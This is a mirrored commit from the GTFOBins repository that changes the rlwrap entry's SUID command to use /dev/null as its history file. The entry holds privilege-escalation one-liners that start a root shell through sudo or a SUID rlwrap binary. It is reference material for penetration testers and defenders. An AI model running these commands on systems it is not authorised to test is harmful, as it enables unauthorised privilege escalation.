mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 09:34:56 +02:00
Use /dev/null as history for rlwrap
This commit is contained in:
@@ -5,7 +5,7 @@ functions:
|
|||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo rlwrap /bin/sh
|
- code: sudo rlwrap /bin/sh
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./rlwrap -H /tmp/y /bin/sh -p
|
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||||
file-write:
|
file-write:
|
||||||
- description: This adds timestamps to the output file.
|
- description: This adds timestamps to the output file.
|
||||||
code: |
|
code: |
|
||||||
|
Reference in New Issue
Block a user